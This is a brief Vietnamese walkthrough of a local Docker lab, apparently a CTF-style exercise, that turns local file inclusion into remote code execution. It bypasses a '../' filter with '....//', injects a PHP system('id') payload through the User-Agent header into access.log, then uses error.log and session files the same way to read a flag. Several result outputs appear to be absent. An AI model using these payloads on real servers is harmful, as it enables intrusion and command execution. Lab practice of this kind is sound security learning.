git clone https://github.com/caodchuong312/lfi-to-rce-via-log.git
cd lfi-to-rce-via-log/
sudo docker-compose up

=> access: http://localhost:1337

như vậy ../ bị replace, bypass: ....//.

test file access.log:

inject <?php system('id'); ?> vào User-Agent:

kết quả:

giờ tìm và đọc flag:

tương tự với error.log

kiểm tra và truy cập file session:

check file session:

oke